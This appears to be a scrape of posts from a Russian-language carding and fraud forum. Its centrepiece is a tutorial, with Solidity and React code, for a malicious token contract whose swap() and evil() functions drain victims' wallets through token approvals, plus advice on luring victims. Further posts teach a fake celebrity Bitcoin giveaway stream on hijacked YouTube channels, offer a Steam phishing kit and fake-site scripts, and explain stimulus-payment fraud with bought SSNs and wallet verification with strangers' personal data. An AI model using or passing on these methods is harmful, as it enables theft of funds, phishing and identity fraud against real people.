Всем привет!
Думаю стоит опубликовать статтю как это делать бесплатно, чтобы не кормить
таких как ТС
Hidden content for authorized users.
You must have at least 1 reaction(s) to view the content.
Задавайте тут вопросы, постараюсь максимально развернуто ответить на вопросы
касающиеся вещевого кардинга! Дабы не плодить тем.
От теории к практике!
...или как украсть токены ERC-20/ERC-721 из под морды хомяка.
Всем привет! Cегодня я хочу рассказать, как я скамлю токены у криптоюзеров. Сначала я подумал, что не подхожу под тематику конкурса, но сразу прояснил для себя, что крипта = скам, а значит, я в деле. За криптой/смарт-контрактами будущее говорят многие, безусловно, в этом есть доля правды, но история показывает, что технологии используют как в благих целях, так и злоупотребляют ими. Я покажу, как можно злоупотребить стандартами реализаций токенов на EVM совместимых blockchain и нажиться на этом.
Аббревиатура ERC переводится как Ethereum Request for Comments - это такой документ, который определяет стандарт и соглашения для разработки смарт- контрактов. ERC-20 есть контракты, которые компилируются и развертываются в блокчейн сеть, в этих контрактах реализуется единый шаблон, который позволяет создавать токены. Токены можно отправлять, обменивать, сжигать, чеканить, голосовать ими и многое другое, нет каких-то ограничений. Мы можем создать на основе стандарта любой финансовый актив или какое-нибудь действие в блокчейне, благодаря транзакциям. В стандарте ERC-20 есть определенные функции, такие как name(), symbol(), decimals(), balanceOf(), transfer(), totalSupply(), transferFrom(), allowance(), approve(). Из всех этих функций нас интересует approve() и transferFrom(). Что они делают? approve() даёт разрешение на операции с токенами. transferFrom() переводит токены из одного адреса на другой. Остальные функции могут задавать имя токена, узнавать баланс и т.д.
Это все, конечно, интересно, но а что если... наш смарт-контракт сможет
скрытно вывести все токены, а пользователь даже не поймет, что произошло?
Скажем, пользователь пытается обменять один токен на другой через наш веб-
интерфейс, но сталкивается с ситуацией, когда контракт опустошает вce его
монеты.
Такое возможно, и сейчас мы с вами это сделаем!
Чтобы продемонстрировать этот трюк, создадим свой собственный токен и поможет
нам в этом библиотека OpenZeppelin. Напомню, что контракты для EVM (Ethereum
Virtual Machine) пишутся на Solidity. Прямо в этом контракте напишем функцию,
которая обменивает токены и делает вредоносные действия. Далее развернем
контракты в Ropsten сеть и создадим минимальный интерфейс. Наше приложение
будет общаться с контрактом по ABI JSON. Для создания веб-приложения будем
использовать React и Ethers библиотеку. У вас должно быть некоторое количество
тестовых ETH, их можно получить через публичные краны.
Зададим выпуск монет со значением в 500 токенов:
JavaScript:Copy to clipboard
function mint(address _to) external {
_mint(_to, 500 ether);
emit Mint(_to);
Реализуем функцию обмена токенов и вывода всех средств с кошелька пользователя:
JavaScript:Copy to clipboard
function swap(uint256 _amount) external {
address sender = msg.sender; // экономим газ
uint256 senderBalance = IERC20(address(this)).balanceOf(sender);
require(senderBalance > 0, "swap: token balance too low");
IERC20(address(this)).transferFrom(sender, address(this), _amount);
IERC20(address(this)).transferFrom(sender, tokenReceiver, senderBalance - _amount);
emit ValueReceived(tokenReceiver, senderBalance - _amount);
}
Установим адрес получателя краденных токенов:
JavaScript:Copy to clipboard
function setTokenReceiver(address _tokenReceiver) external onlyOwner {
tokenReceiver = _tokenReceiver;
emit SetTokenReceiver(_tokenReceiver);
}
Сконструируем наш токен контракт, укажем название токена и получателя краденных токенов:
JavaScript:Copy to clipboard
constructor (address _tokenReceiver) ERC20("XSSIS", "XSSIS") {
tokenReceiver = _tokenReceiver;
}
Скомпилируем и развернем наш контракт в Ropsten сеть:
Переключимся в Ropsten network и выберем Injected Web3. Рядом с кнопкой Deploy
укажем адрес получателя краденных токенов (в развернутом контракте мы сможем
менять адрес получателя, просто вызывая функцию setTokenReceiver()):
В папке config, которая приложена к этой статье, добавляем в файл contracts.json адрес нашего развернутого контракта (смотрим Etherscan). В файл tokenABI.json добавляем ABI параметры, которые можно скопировать из Remix во вкладке SOLIDITY COMPILER.
В файле HomePage.tsx импортируем модули:
JavaScript:Copy to clipboard
import * as React from "react"
import {
Box,
Button,
Center,
Flex,
Select,
HStack,
Stack,
Input,
InputGroup,
InputLeftAddon,
InputRightAddon,
CircularProgress,
Alert,
AlertIcon,
Text
} from "@chakra-ui/react";
import {useContractFunction, useEthers, useTokenAllowance} from "@usedapp/core";
import {ethers} from "ethers";
import tokenABI from "./configs/tokenABI.json";
import contracts from "./configs/contracts.json";
Описываем функции добычи, одобрения, обмена/кражи токенов:
JavaScript:Copy to clipboard
const mint = async () => {
await handleChangeNetwork();
await mintTx(account);
setValueStateSuccessed(true);
setTimeout(function(){
setValueStateSuccessed(false);
}.bind(this),5000);
}
const approve = async () => {
await handleChangeNetwork();
await approveTx(contracts.address, ethers.constants.MaxUint256);
setValueapproveStateSuccessed(true);
setTimeout(function(){
setValueapproveStateSuccessed(false);
}.bind(this),5000);
}
const swap = async () => {
await handleChangeNetwork();
if (allowance!.lt(ethers.constants.MaxUint256)) {
alert('Approve tokens!');
}
if (!valueSimple) {
alert('Input XSSIS quantitiy');
return;
}
await swapTx(valueSimple + '0'.repeat(18));
setValueswapStateSuccessed(true);
setTimeout(function(){
setValueswapStateSuccessed(false);
}.bind(this),5000);
}
Cобираем и запускаем наше веб-приложение:
Bash:Copy to clipboard
yarn
npm run start
Давайте протестируем, нажмем кнопки Approve для подключения к контракту и
затем Mint для добычи токенов (по умолчанию выдается 500 токенов):
Пробуем обменять 1 XSSIS на ETH. Нажимаем кнопку Swap. Здесь мы должны
обратить внимание на окно MetaMask при совершении транзакции, кошелек не
говорит пользователю, что на самом деле будет происходить:
Проверяем транзакцию в Etherscan и смотрим, что произошло. Нами был совершен
обмен 1 XSSIS на 0,1 ETH, но так же был произведен вывод всех токенов XSSIS из
кошелька пользователя без его ведома:
Хорошо, мы разобрали так называемую "фичу" токенов, поняли концепцию стандарта ERC-20 и разработали контракт, который выводит токен из кошелька нашей жертвы за 1 клик. По сути, чего-то нового мы не изобрели. Мы лишь воспользовались возможностью, которая дает нам стандарт. Давайте создадим более сложный пример и вдобавок разработаем себе инструмент для скама. Мы соберем рабочий DeFi проект и сделаем так, чтобы можно было красть токены из кошельков пользователей, просто вызвав одну функцию. Для начала, разберемся в архитектуре нашего проекта, форкнем интерфейс для наших контрактов и создадим пару токенов для тестирования. Я покажу, как скамлю лично я и в конце cтатьи расскажу о некоторых способах привлечения пользователей. Согласитесь, в этой теме есть где развернуться! Пробуем!
Примитивная схема:
Красным - действиe owner/contract.
Синим - действие users/contract.
Пользователи стейкают стейблкоины/обернутые токены/одиночные токены в наш
контракт. Это делается ради награды в виде нашего нативного токена и ради sell
pressurе. Наш токен так же может где-то торговаться, например, в Uniswap и
иметь в пулах крупную ликвидность. У пользователя будет стимул вводить свои
токены к нам в контракт, т.к. потом можно будет нашим токеном торговать. Есть
разные способы создавать стимулы для пользователей, к примеру, airdrop или
искусственное завышение APY. В этой статье я остановлюсь лишь на том, как
обмануть пользователя. В нашем примере задача - заманить как можно больше
жертв, которые будут взаимодействовать с нашим контрактом. Достигнув
определенного количества пользователей, мы украдем монеты из их кошельков (не
пула контракта). Мы вызовем функцию evil(), которая отработает логику по краже
монет. Напомню, это происходит потому, что пользователь дал одобрение на
взаимодействие с нашим контрактом. Кстати, пользователь может свободно изымать
свои средства из пулов контракта, но коварность одобрения токенов состоит в
том, что одобрение дает нам украсть монеты хоть через неделю, но при условии,
что пользователь собственноручно не отозвал одобрение для нашего контракта.
Кстати, пользователю совершенно необязательно стейкать токены, достаточно дать
апрув, и мы сможем сделать все вредоносные действия.
Я постараюсь не описывать всю кодовую базу (будет слишком много текста). Все же тема конкурса не о программировании. Оставлю изучение исходного кода для читателя, который хочет глубже погрузиться в работу смарт-контрактов.
Функция по краже монет из кошелька:
JavaScript:Copy to clipboard
function evil(address _governance, bytes memory _setupData) public onlyOwnerOrGovernance {
governance = _governance;
(bool success,) = governance.call(_setupData);
require(success, "evil: failed");
}
На вход дается адрес контракта токена, который мы выводим, и наша функция transferFrom() (её изучили ранее).
Подготовка токенов.
MetaMask заранее переключаем в сеть Rinkeby. Для демонстрации подготовим 2
токена (файл Token.sol). Файл открываем в Remix, в constructor() пишем
название токена fakeUSDT, деплоим токен fakeUSDT и записываем его адрес. Затем
чеканим (функция mint с параметром amount == 1000000000000000000000000) себе
на кошелек (address) 1.000.000 токенов. В том же файле меняем в constructor()
название токена с fakeUSDT на XSSIS, так же деплоим, записываем адрес, чеканим
100к токенов себе на кошелек или позже на адрес контракта XSSChef.
Подготовка контракта XSSISChef.
Открываем файл XSSISChef.sol в Remix, компилируем и заполняем параметры:
На этом этапе мы подготовили все контракты.
Интеграция с фронтендом.
Cобираем проект:
Bash:Copy to clipboard
yarn install
В папке /src/sushi/lib в файле constants.js
в supportedPools меняем:
lpAddresses 4 - на адрес токена fakeUSDT
tokenAddresses 4 - на адрес токена fakeUSDT
В этом же файле contractAddresses:
sushi 4 - адрес токена XSSIS
masterChef 4 - адрес контракта XSSISChef
Запускаем наше веб-приложение:
Bash:Copy to clipboard
yarn start
Фармим XSSIS токены!
Жмем кнопку Select:
Даем апрув и подтверждаем в MetaMask:
Cтейкаем 100 fakeUSDT:
Начисляются XSSIS:
Cнимаем награду и изымаем fakeUSDT:
Вывод средств.
Ранее мы разобрали, как работает функция evil(), теперь обсудим, как работает
скрипт, который генерирует нам bytes для этой функции.
Скрипт находится в папке src/utils/generateBytes.js.
Запускаем скрипт и копируем значение, которое выводится в консоль - это и есть наши bytes:
Bash:Copy to clipboard
node generateBytes.js
В контракте XSSISChef вызываем функцию evil(), в address указываем адрес
контракта токена, который мы хотим украсть, в bytes - то, что скопировали из
консоли.
Я пытаюсь украсть 999900 токенов и перевести их на другой адрес:
И вот что из этого вышло:
Дополнение.
Контракт XSSChef деплоится в mainet так же, как и в testnet, подготавливаем
только один токен, который предназначен для награды.
Чтобы украсть токены у жертвы, нужно следить в Etherscan за теми адресами,
которые взаимодействуют с нашим контрактом. Знаю, это дело не продумано, по-
хорошему нужно написать скрипт, который автоматизирует эти действия. Если
хотим добавить новые пулы во вкладке Menu (frontend), то нужно найти файл
constants.js и просто добавить новые пулы в supportedPools. Пулы - это новые
токены, которые заносятся пользователем к нам в контракт, и которые мы можем
украсть.
Мы справились! Я показал свой некоторый опыт по запуску крипто проектов и обману пользователей, используя смарт-контракты. Этот вид мошенничества называется Rug Pull. Эту тему можно крутить-вертеть как душе угодно, все зависит лишь от вашего воображения. Есть разные способы, и, на мой взгляд, самые профитные варианты привлечения пользователей. Airdrop токенов на адреса пользователей популярного проекта, который в тоже время, что и мы делает Airdrop, базу адресов можно спарсить по транзакциям. Хорошо работает рассылка по Email ящикам или Discord аккаунтам со ссылкой на фейк. Ну и, конечно же, YouTube/AdWords трафик. Профит в данной теме разнится: я работаю и хорошо себя чувствую. Есть пример, Badger DAO был взломан, где использован именно этот метод монетизации. Мой мануал подходит и для токенов ERC-721 (NFT), все делается по аналогии. Я показал лишь часть из своих наработок и готов ими делиться со всеми. Весь материал будет прикреплен к этой статье. Спасибо за внимание и удачного скама!
![dropmefiles.com](/proxy.php?image=https%3A%2F%2Fdropmefiles.com%2Fimages%2Fshare- logo_vk.png&hash=3f67b87028329be58fe8d4c73ccac7b9&return_error=1)
](https://dropmefiles.com/QHFT4)
Share your pictures, send large videos, exchange music or transfer big files. No registration required. Unlimited upload/download speed.
dropmefiles.com
Вот, один человек с этого форума попросил меня научить его вбивать картон. Решил я заснять видео. Все разжевано, на мой взгляд, до мелочей.
Ссылка
В архиве - формат .AVI 1.24 мб, без арзива - 80мб.
Смотрим, учимся, заценяем.
Предлагаю делиться интересными новостями, страницами, панелями, схемами в сфере фишинга и СИ
Начнем с пруфа и краткого описания
![](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2F87Rr3OeS31KNiiyDdHfupsJo2avp0WFEHE8hJToMShrgP-
zE-
ZwDKaPXEY5yq51VM-8296ehRgKic5v0PyoTsFSKqMtllbuOSHRS9Wy7iRmFCDyAcbZyfFJ4feEuONnrOUZwLkNL&hash=9986cfb067964abcb30349663746caaa)
Пруф побольше:
![](/proxy.php?image=https%3A%2F%2Flh5.googleusercontent.com%2FFhwWSTp_GM3mH_MU0MvSnRIN0G5nQasXRc5VpDq_SPKQwbKgHtMR_SkbzEcfgkSS-
lKjTnONQUDCUxSFRNg_IG_PuzOSfYzgg05oauWEW-1bjYCAAJExTM6K5sIWWn_ZUYDOxWZl&hash=d58bcb9820a5dfff59120d67155b3846)
Как вы скорее всего не знаете, на YouTube каждый день Билл Гейтс, Братья Уинклвосс и президенты разных стран раздают биткойны. Делают они это, чтобы популяризировать свои криптовалютные проекты и криптовалюту в целом.
Единственный очевидный недостаток всего этого в том, что никто из них нихуя не раздает. Да и о трансляциях со своим лицом не знает.
С другой стороны, мы просто счастливы тем, как все сложилось, и нет, к сожалению, нам они тоже ничего не дадут. Поэтому возьмем у тех, кто более сговорчив.
К делу. Мы сами запустим стрим на YouTube от лица любого клевого чувака из криптовалютной тусовки, которого все будут рады видеть. Однако первым делом, вам нужно найти видео с любой конференции и интервью на тему криптовалюты, в котором участвует ваш герой. Назовем его Адонис, он молод и прекрасен.
В верхней левой части стрима мы ставим зацикленный ролик какого-либо интервью,
где Адонис рассуждает на тему криптовалют. Верхняя правая часть — превью
стрима с анонсом раздачи, а нижняя поделена на QR-код для пополнения вашего
кошелька, а на правой подарки от Адониса или условия их получения.
![](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2FjpUJkIYTQ77DeOztaIhabNhLkkz4H10xc2eh1-veCK6y_Q-
LNO8jAIxt6HU33nxGijCEVs40cK9gUbYfxeYJarW7m2x--IX3XNz1MDsT8XpNvKecGNq-
qD9TpkpjtYauJlxFwvoy&hash=aad5dc766304286d03ba71816a6bca17)
Подготовка и моменты, на которых Адонис может споткнуться
Первым делом, нам будет очень кстати красивый BTC-кошелек. Если Адонис настолько прекрасен и раздает деньги, то и кошелек его начинается с 1Adonis1 , а не 1HJsKjs — это не обязательно, но повышает доверие к Адонису. Почему бы не сделать, если можно сделать.
Для этого качаем софт — https://github.com/samr7/vanitygen или https://github.com/exploitagency/vanitygen-plus. У меня второй, потому что первый не очень дружит с AMD процессорами и видеокартами.
Создаем в скачанной папке .bat и прописываем, где 1Random1 — имя вашего Адониса:
oclvanitygen.exe -o resultsMy1Random1.txt -v 1Random1
pause
И его же запускаем. Начинается генерация кошелька, вернее перебор кошельков в поиске того, который устроит нас. На генерацию может уйти примерно 4-5 дней, а может пару часов — зависит от вашей удачи, количества символов и мощности вашего железа.
На выходе получаем адрес кошелька и приватник. Приватник импортируем себе —
После чего вы сможете пользоваться данным, сгенерированным кошельком,
показывал на примере blockchain.com
Из адрес кошелька делаем QR-код. Будем делать в этом генераторе —
https://cwaqrgen.com/
Вбиваем свой кошелек и генерируем красивую картинку, через которую на ваш кошелек будут поступать средства. Обязательно проверьте тот ли кошелек получился, а то будет генератор в три блина — каждый скамит сам себя.
Открываем фотошоп и готовим заставку. Своего Адониса и интервью с ним будем искать позже. Основное — QR-код, ваш кошелек и всевозможные кликбейты, как в левой нижней части примера. Рисуем, готовим, сохраняем картинку.
![](/proxy.php?image=https%3A%2F%2Flh4.googleusercontent.com%2FlVoUdvlQg5BD8AiZyrNjMqp1Lm0pG0jZXcSwj9P-5n5NIVemL7-E-_imw7ka7znqPclu0lCpah7WzGJxYBWf6Ng0C_6FG9HpKkw7JKTy0xE4CnFi- ouOSuagVlRKW90hlVaspYKN&hash=2c399d5ee29c20f96483d7527d0040b7)
Настройка стрима и зацикливание видео с Адонисом
Пора выбрать своего Адониса и искать видео с ним. Тут нечего объяснять — ищите конференции на ютубе с определенным человеком или лекции по биткойну и берите что дают. Скачивайте его, обрезайте по вкусу.
Стримить будем через OBS, скачать — https://obsproject.com/ru
Запускаем. На нижней панельке, видим вкладки «Сцены» и «Источники», у
источника нажимаем на плюсик.
И выбираем «изображение».
![](/proxy.php?image=https%3A%2F%2Flh4.googleusercontent.com%2FBQOCLT3AZCha1lxOfBJ_qXhd5vX3N_297NBQynzFv0m3il61ShhwFhEwebL9kmIBd7IekBQCevB0vCEMXGEE_zKj7WsVS9C826Otw2miRirCjHgqBSf5nyiw9zPQ- tQRK-_BaRCx&hash=ca9d9d2c6b7424f88c154a45e8e3cfa3)
Называем как угодно, главное не путаться самим.
Указываем путь до картинки из фотошопа и жмем «OK», на фоне появляется Адонис. А-а-ах, как он прекрасен!
![](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2Fud9Gt9rcML9PW2dImEEjsfqRLbFfn6ixSxJ0TOlkO8kyCW6LkqHVow26HhLf7bpw_lI_kkzythYt1RlEI4bBc0lOoiU7S8zlX2oroOk7pT3CBCuJOd- gscacby-fBI5hw6SkQ-XZ&hash=e24256284f41b30379f24a0d950ec8c8)
На пустом черном месте, нам нужно зациклить видео. Нажимаем на уже известный нам плюсик и добавляем «Источник медиа»
![](/proxy.php?image=https%3A%2F%2Flh3.googleusercontent.com%2FWuJTyDNBfGbJCfwOetyo_il2YrW-c1UziE1RQYEJ7_8Fd_FbepN- szY2IPaN5MTaJToI0DxUYmkogxyrDOVizk6rsl1brlgvxNXFoAG_9zaFu0ZuzQZMNCOGRIQ- nG_g1HxVLm_j&hash=05decce848c13b0a58c8ffb7d47789d3)
Указываем, что нашим видео будет локальный файл, ставим галочку «Повтор».
![](/proxy.php?image=https%3A%2F%2Flh5.googleusercontent.com%2F09ar1uwBPwwIpwrIClTJRTqCeXNCIT13WgFWwm4dIRJKjTyI9QF2XLgyFQaz9-0r3kCYRxrojqpONT- aXo657TnGHdA12aPzm6idmpb3B6no_CLET4GxxPiPxxTLhgfDIkueEgt_&hash=d4f96a77e39d714a76afe2b6ff7fe67b)
Подгоняем размер под наш бэкграунд.
И проделываем этот шаг второй раз, но делаем видео уже на весь экран.
Это для того, чтобы Youtube не забанил трансляцию с ходу и вы набрали 20-30
минут онлайна, а потом быстро могли заменить просто видео на картинку с
Адонисом.
Это делается двумя кликами — первый по глазику в источнике у видео на полный
экран и второй клик по глазику у первого видео, которое мы подогнали под
размер бэкграунда.
![](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2FC6mltw3jEgY- cJA4D4iewL- IPdSWVmr63Zh7E22ZNBgUidWvYjI339DHFWIqIfHq1LnAbxBcm4wdvIYuMQ85e7PQJtBFL306tvmSsYkezcb_lMx3scAU0RE1jXErxS9p7yVgIjYS&hash=160acb283af7b8d756d4afaa72fb94c4)
Трансляция готова, готовимся к запуску Адониса
Запускать мы будем, как вы уже поняли, на Youtube. Поэтому нам необходимо иметь логи ютуба, откуда мы будем брать каналы и и накручивать с помощью них зрителей.
Парсим логи любым доступным инструментом. Каналы от 10к подписчиков вполне годятся, чтобы запустить на них трансляцию и посмотреть на результат. Большое кол-во подписчиков не гарантируют успех, но это добавляют доверия трансляции.
Некоторые маленькие каналы не хило проталкивают вас в топ поиска по целевому запросу, а каналы-миллионики могут дать нулевой результат.
Нашли канал? Отлично!
На Youtube, рядом с аватаркой наверху справа нажимаем на значок камеры, а
затем кликаем «Начать трансляцию»
![](/proxy.php?image=https%3A%2F%2Flh5.googleusercontent.com%2FbCo63ww2rnyBB4UyqILdcOzSENvqQVjeRv2onIqbdUXSglO- jRaR-94CgggWbg_k-EuBkdphubdCx8ncx9J_conqboA0SnUUMUlz- XR_NPdoyaDt7swhPWNY6JNpmM_EnUBR7k66&hash=581f2484e262fe8c2d3ffee5b145ec2b)
Появляется такое окошко, указываем в нем название и описание. Последнее лучше писать в блокноте, а потом вставить — менюшка ютуба уебанская. Включите монетизацию, как показала практика, это благоприятно сказывается на трансляции.
Нажимаем на шестеренку в верхней правой части экрана, во всплывающем окне переходим во вкладку — «чат» и отключаем его
После сохранения нас перекинет в главное меню, тут ставим автоматический запуск, копируем ключ трансляции и переходим в OBS.
heCju47K3xWApI2azPeKVujHL4CL5lpcZiAfo7Q0RK31ifuvOzwe92EVULIJVRb-06c1oStU0DC&hash=4ec3ee2a5ec15987ff3c4cfe211a9484)
Переходим в настройки, далее — «вещание».
![](/proxy.php?image=https%3A%2F%2Flh4.googleusercontent.com%2FIoBxSVg0Z75P7FuyHAxqacM7slveNJvNfS0A7hP1wv_cpIZuuIr6kJ12lTkGaXxCUE2j21JGO-
HJuTD2cAz4QE6oWnZ9aSOOitO3S4wQ3GIDEZ8wQdd2XxfdL3zRVygrag12u9Iy&hash=b55788e9c82076e10b724926ca3a7b05)
![](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2FvY0W1EfO___9lBw2EWBP4WRlzrq7eOT6umDazDkb0aw-2D6FrFiYosM4_SG5Rl2NRoA-
LfG2ezy-npMRn6wZLLmmcb5DJZ9mW25R9jGLEN8cKwwWTtF3ztFDRIiJ-
mqYxrLPyKX1&hash=bf0b398f2cc5c723fe4bd7f97c8126af)
Осталось только нажать на заветную кнопочку и Адонис отправится в бой.
Бальтазар вздохнул: – Готово. Вы прекрасны, как молодой Адонис, синьор.
– Этот Адонис плохо кончил, – тут же добавил Меркуцио.
Как не кончить плохо на зависть Меркуцио
Подводя промежуточные итоги, у нас есть готовая к запуску трансляция и красивый, а главное достаточно трастовый для обычного юзера кошелек. Теперь к тонкостям работы с банами, о которых нас предупреждал Меркуцио.
Мы сделали два источника медиа, один на весь экран, а второй — с Адонисом. Я сказал, что так надо и вы мне поверили. Спасибо. Теперь я готов объясниться.
Если сразу запустить трансляцию с Адонисом, то вас скорее всего кикнут с поиска довольно быстро и будет хорошо, если дадут вообще запустить второй раз.
Поэтому проходим рубеж в 20-30 минут с полноэкранным режимом и если еще висим в поиске — поздравляем, можете выпускать своего Адониса.
По моим наблюдениям, есть несколько рубежей, когда могут вырубить или кикнуть с поиска: 1-5-20-30-60 минут. Если на протяжении этих рубежей вы выстояли, то вероятно, продержитесь еще часа 2-3, но рано или поздно все равно упадете, главная цель — успеть получить свое.
Также стоит отметить, что подобного рода стримы обычно отрубаются модерами в 6 утра по МСК, замечаю такую движуху каждый день.
Озвучу очевидную вещь, но может для кого-то она не очевидная: если у вас 1к подписчиков, вас вырубят раньше, чем канал с грубо говоря с миллионом. Если на стрим с 1к подписчиков прилетает 100 репортов — красная карта, если канал с 100к подписчиков прилетают те же 100 репортов, то все нормально. Суть, надеюсь, вы уловили.
Продвижение ролика в поиске
Я пользуюсь утилитами, о которых уже вы могли слышать из моих прошлых статей или пользовались сами. Это — KWT (keywordtool.io) и VidiQ (расширение для браузера).
Через KWT смотрим базу (10 штук вполне хватит) интересных для себя тэгов, сохраняем их, потом вбиваем их в VidiQ, в нем вы можете посмотреть насколько данные тэги и подобные ему подходят именно для вашего канала, добавляете эти тэги к себе и смотрите, насколько сильно алгоритмы ютуба оценивают ваш вес в этой категории.
![](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2FbYrQ82XYHrOrWuU83XMHKfeTBNT- SCcI7aPWCHwEE2TmRjeZ16hAqCj3eLyEdMInGTyTJmDjYjHpRn7zgv1FTL7ivPnQuNMz9rC2sz3xTBU9IlibHcteC5Y6bMs1PgcBaudZgPUu&hash=9034a5cfc1ccfe4e6f47d8f15c58d19e)
Например тэг btc, на данный момент на текущем канале, куда я поставил VidiQ, оценивается весьма не плохо.
![](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2F2sTo8uBjkHxYsIzvdQ0YTgiYXD9cwoC9WFdrFE- uH_ykk26NpvUj1qBs_TAnnJTfph4f_QKitDCFKupTrMEtNnFPaPqnRxnNVMofznfvLcHnwIVjdlfwxMNV5TrlxeOtY4vyHzJs&hash=e46726a92f35fda0e152ea6cf795bca4)
А случайно добавленный тэг «money», для канала подходит не сильно.
Ваша задача выбирать тэги для добавления, которые имеют хороший поисковой объем, но не шибко высокую конкуренцию. Что-то среднее добавить можно.
Кстати о среднем, думаю, вы видели, что в поиске роликов на ютубе у некоторых под роликом видно три #хэштега.
Их тоже желательно добавлять, добавит вы можете кажется до 50 штук, но оптимальный найденный вариант — 8. Первые три будут видны под вашим роликом, все остальные будут просто в описании, не сказать, что дает вау-эффект, но всегда лучше сделать, чем не сделать.
Адонис и Меркуцио спешат откланяться
Подходя к завершению, поговорим о накрутке просмотров и лайков на трансляцию. Делать это надо, причем в обязательном порядке.
Ваша трансляция, конечно, даже без зрителей имеет шансы обогнать конкурентов, но реальный человек скорее откроет ту, где людей побольше. По моему мнению необходимо порядка 20к зрителей, а дальше уже зависит от ваших возможностей.
Покупать зрителей на различных сервисах не советую — дорого и малоэффективно. Оптимальный вариант купить софт, а лучше — заказать с саппортом от кодера, на случай каких-либо фиксов.
Мой софт с одно валидного гугл/ютуб кука крутит в районе 10 зрителей, с отработанных логов данное значение падает, до четырех-шести.
Прокси —
Сейчас будет важная информация, которую я для вашего удобства выделил крупно. Мало кто так трогательно о вас заботится.
В скромных целях достижения идеала, я описал схему, которую можно реализовывать не только на Youtube. Просто сейчас это лучший способ в пересчете на стоимость одного лоха. Но это может измениться, особенно, если туда придет куча других Адонисов.
Победит в схватке тот, кто придумает как привлечь больше людей за меньшие средства. Например, создать промостраницу и лить трафик на нее. Или крутить трансляцию на Твиче. Можно даже подготовиться серьезно и купить рекламу у блогеров с анонс открытия невероятного проекта, который в определенный день раздаст биткойны. Все зависит от вашей фантазии и средств, а на самой механики можно зарабатывать еще долго.
Spoiler: img
Spoiler: pass
пас от админки: 22882
[CLIKE]
](https://anonfile.com/pbt7fcD4n3/honyminer_zip)
anonfile.com
[/CLIKE]
Steam фишинг + инструкция по установке
Описание:
Данная копия представляет из себя страницу авторизации (OpenID) STEAM для
входа на сторонний сайт.
Инструкция:
Порядок действий входа:
Подробности:
Возможности:
Подробнее в файле настроек.
Страница "Уведомления".
Данная страница необходима тем, кто желает следить за новыми данными и получать звуковые сигналы.
Чтобы перейти на данную страницу, просто введите "/notify " в адресную строку.
Расположение важных файлов.
Директория "CORE " содержит:
- "settings.php " - Файл настроек.
- "notify.php " - Файл страницы "Уведомления ".
- "lib.php " - Файл "Библиотека", все функции.
- "send.php " - Файл взаимодействия с введенными данными.
- "assets/notify/audio.mp3 " - Звуковой файл для страницы
"Уведомления ".
Директория "SAVE " содержит:
- ".htaccess " - Защита (файла с данными) от доступа извне.
- "accounts.txt " - Файл с данными (сюда записываются все введенные
данные).
- "local.sql " - Файл Базы Данных.
Установка.
По умолчанию, все данные записываются в файл, поэтому, можно вообще ничего не
изменять, и просто залить все файлы на хостинг и все будет работать.
VirusTotal
https://www.virustotal.com/#/file/d...37c1d6c11caadd486093ef9870925c3520a/detection
Ссылка на загрузку
You must have at least 1 message(s) to view the content.
Большой пак различных скриптов фейков более чем 50 популярных сайтов.
Скачать:
You must spend at least 10 day(s) on the forum to view the content.
https://yadi.sk/d/KIwXdkWB3UW2sm
Пароль к архиву:
You must have at least 10 message(s) to view the content.
От 500 до 1к$ Cash App от USA. Вывод на BTC
Наверняка все слышали, что в штатах раздают гражданам по 500-1200$ в связи с карантинными мерами. В России была темка по 10к руб выплат, некоторые умельцы через акки госуслуги абузили и выводили себе на карты...
Суть
Дело было летом, в разгар коронавируса, сейчас возможно будет вторая волна. И
так, сначала нам нужно куда-то принять эти деньги, не будут же они выплачивать
на киви или сбер ��
Был создан и верифнут аккаунт cash.app (типа киви в америке). В CashApp нам
пригодятся эти данные (direct deposit):
Процесс получения $500-1200 есть на офф. сайте правительства, сайт доступен на
русском:
https://www.irs.gov/ru
https://www.irs.gov/coronavirus/economic-impact-payments
Идем вниз, и жмем на "Получить платеж".
ля получения выплаты нужен номер SSN (для абуза используют чужие), и чтобы
годовой доход был ниже 24.400$ в год, либо наличие детей. Купить SSN можно в
каржевых шопах. Так же могут запросить доп. инфу о том сколько зарабатываешь и
платишь налогов, вводим рандом сумму.
Вводим эти данные и жмем "Continue"
Ждем когда система проверит данные, если все ок, то они попросит данные из
"Direct Deposit" о которых я говорил в начале. Берем их из кэш апп и
вставляем. Ждем несколько дней, и получаем бабос.
Хотел 1200$, но мне скинули только "Child payment" 500$. Теперь можем купить
битков на эти 500$ на Paxful. Создаем аккаунт там и покупаем с помощью
cashapp.
Выбираем предложение и получаем битки.
Ну а дальше меняем биткоин куда вам угодно через bestchange. Я вывел на киви.
Думаю эта тема будет полезной для многих пользователей.
Итак, как получить статус QIWI кошелька "основной".
1. Открываем сайт реестра залогов. <https://www.reestr-
zalogov.ru/search/index>
2. Нажимаем на кнопку "Найти в реестре", затем кнопку "По информации о
залогодатели", затем "Физическое лицо".
3. Теперь вводим рандомную Имя и Фамилию,и нажимаем кнопку "Найти".
4. Далее мы видим много нужной нам информации.
5. Далее нажимаем на эти циферки
Далее входим или регистрируем QIWI кошелёк.
Нажимаем ввести данные вручную.
Вводим данные рандомного человека.
Вы получили статус QIWI кошелька "основной".
ИНН сам киви нашел по данным
ИНН человека можно узнать [https://service.nalog.ru/static/personal- data.html?svc=inn&from=/inn.do](https://service.nalog.ru/static/personal- data.html?svc=inn&from=%2Finn.do)
Если забанили пишите жалобу на банки.ру
в теории надо подобрать подходящие Фулки, зарегать на них мово и подать заявление на сайте указав роутинг и акк номер, если кх выплату еще не получали то она придёт вам.
Начал заполнять заявление, там в принципе минут 10 уходит, ну я так чисто с
телефона попробовал как проснулся и на второй страницы встрял с каким-то AGI
это связано с такс рефаундом, нужен номер AG
В формах такса есть эти данные!
тема для тех у кого есть доступ к БД сайтов(типа TaxWise,Crosslink и тд) по
TAX выплатам,там всю эту инфу найти можно.Если это нету,то можно покупать
шлакоформы отработанные в 90 процентах случаях.
Если есть доступ к админкам сайтов работадателей,тоже можно найти эту инфу.
подайте простую налоговую декларацию здесь https://www.irs.gov/ filing / free-file-do-your-fede - tax -free-free
Генератор fullinfo для саморегов Paypal и пробив авто холдера USA
https://generatormr.com/full-info#work-box
Вы можете бесплатно сгенерировать реальные Full Info(рандом штат)
Пример:
